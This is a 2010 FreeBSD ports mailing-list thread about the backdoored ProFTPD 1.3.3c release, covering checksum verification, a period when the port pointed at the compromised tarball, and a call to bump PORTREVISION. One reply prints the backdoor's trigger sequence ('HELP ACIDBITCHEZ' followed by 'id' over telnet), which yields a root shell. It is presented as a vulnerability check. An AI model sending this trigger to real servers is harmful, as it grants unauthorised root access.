ftp/proftpd 1.3.3c with a version which contained a backdoor.
Hello, people! What do you think is it worth to pay attention to these events: http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org and that in this case needs to be done with the port ftp/proftpd itself? Thanks! ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
В Thu, 2 Dec 2010 23:22:06 +0200 Ivan Klymenko fi...@ukr.net пишет: Hello, people! What do you think is it worth to pay attention to these events: http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org and that in this case needs to be done with the port ftp/proftpd itself? Thanks! Check vulnerability of your server, you can by using the following command sequence: $ telnet 1.2.3.4 21 Trying 1.2.3.4... Connected to 1.2.3.4 Escape character is '^]'. 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4] HELP ACIDBITCHEZ id ; uid=0(root) gid=0(root) groups=0(root),65534(nogroup) ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
On Dec 2, 2010, at 1:22 PM, Ivan Klymenko wrote: What do you think is it worth to pay attention to these events: http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org and that in this case needs to be done with the port ftp/proftpd itself? Presumably/hopefully, the proftpd tarball which contained the backdoor would fail to match the distinfo for the port: SHA256 (proftpd-1.3.3c.tar.bz2) = ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1 SIZE (proftpd-1.3.3c.tar.bz2) = 4166609 Checking, the tarball you now fetch is the one which matches their md5 and GnuPG signing from the link above... Regards, -- -Chuck ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
On Thu, Dec 2, 2010 at 14:00, Chuck Swiger cswi...@mac.com wrote: Presumably/hopefully, the proftpd tarball which contained the backdoor would fail to match the distinfo for the port: SHA256 (proftpd-1.3.3c.tar.bz2) = ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1 SIZE (proftpd-1.3.3c.tar.bz2) = 4166609 Checking, the tarball you now fetch is the one which matches their md5 and GnuPG signing from the link above... For several hours on Wednesday the distinfo was updated to the compromised version (it has been reverted), so anyone who updated this port recently should check their system. -- Rob Farmer ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
On Dec 2, 2010, at 2:55 PM, Rob Farmer wrote: Checking, the tarball you now fetch is the one which matches their md5 and GnuPG signing from the link above... For several hours on Wednesday the distinfo was updated to the compromised version (it has been reverted), so anyone who updated this port recently should check their system. I see-- that's useful information to be aware of. Hopefully port maintainers practice a bit more wariness about distfiles changing unexpectedly; while it's common enough that people re-roll tarballs for whatever reason, it seems like there have been more incidents of reference sites getting owned... Regards, -- -Chuck ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
On Dec 02, 2010, at 17:56 , Chuck Swiger wrote: On Dec 2, 2010, at 2:55 PM, Rob Farmer wrote: For several hours on Wednesday the distinfo was updated to the compromised version (it has been reverted), so anyone who updated this port recently should check their system. I see-- that's useful information to be aware of. Hopefully port maintainers practice a bit more wariness about distfiles changing unexpectedly; while it's common enough that people re-roll tarballs for whatever reason, it seems like there have been more incidents of reference sites getting owned... If ya'll are _absolutely_ certain that the current distfile is correct and not compromised then I would _strongly_ recommend that you bump PORTREVISION to make it absolutely obvious that folks see this. -aDe ___ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org
